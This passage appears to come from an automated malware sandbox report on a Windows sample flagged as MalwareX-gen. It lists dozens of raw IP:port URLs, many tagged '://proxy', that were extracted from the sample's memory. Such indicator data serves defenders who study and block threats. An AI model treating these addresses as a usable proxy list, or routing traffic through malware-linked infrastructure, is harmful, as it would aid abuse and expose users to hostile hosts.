                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:11729://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:24191
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:24191://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:2871
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:2871://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:7315
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:7315://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:9257
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:9257://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.73.245.205:999
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.73.245.205:999://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.1.210.163:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.1.210.163:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.104.254:8000
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.104.254:8000://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.143.134
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.143.134://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.143.134:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.180.222:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.180.222:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.160.223.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.160.223.33:8181
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.160.223.33:8181://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.163.43.124:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.163.43.124:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.61.200.1
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.61.200.104:36181
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.61.200.104:36181://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.75.140.157:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.75.140.157:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.166.167.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.166.167.38:57728
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.166.167.38:57728://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.166.167.55:57745://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.35.213.226:4153
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.35.213.226:4153://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:15261
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:15261://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89767000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:7297
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89767000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:7297://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:7297p
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.174:22669
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B36D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:13497
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:13497://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:13497x
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29129
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A34E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29129://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:26077
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:26077://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:12121
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:12121://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:19589
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:19589://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:2003
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:2003://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:23333
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:23333://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:3255
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:3255://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A720000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:8001
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:8001://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A16B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:9949
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A16B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:9949://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.222.113:12581
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.222.113:12581://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:15410
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:15410://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:19802
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:19802://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A984000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.169.67.17:87
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.169.67.17:87://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89767000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.169.67.85:87
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.169.67.85:87://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.3
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.35:27360
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.35:27360://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.4
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.41:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.41:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.42:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.42:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.103:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.103:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.105:64935
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B2F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.105:64935://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.97:64943
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.97:64943://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.208.101:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.208.101:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C793000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C8F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.223:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.134:46164://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.137:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.137:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.217.216.239:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.217.216.239:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.217.3:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.217.3:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.49.49.11:31034
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.49.49.11:31034://proxyx
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.52.131.65
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.52.131.65://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.52.131.65:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.119.144.60:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.119.144.60:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A16B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.82.6.220
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A16B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.82.6.220://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A16B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.82.6.220:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.154:7505
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.154:7505://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:38023
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61344
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61344://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61553
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61553://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.84.199.80://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.84.199.80:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.101.62
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.101.62://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.89.101.62:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C6C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.105.136.28:2333
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.233.5.68:55443
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.233.5.68:55443://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.238.79.111:5678
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.238.79.111:5678://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.238.79.111:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.238.79.111:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.241.20.215:55915
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.241.20.215:55915://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B33C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.68.100.177://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.68.100.177:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.68.100.177p
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.77.64.116:3128
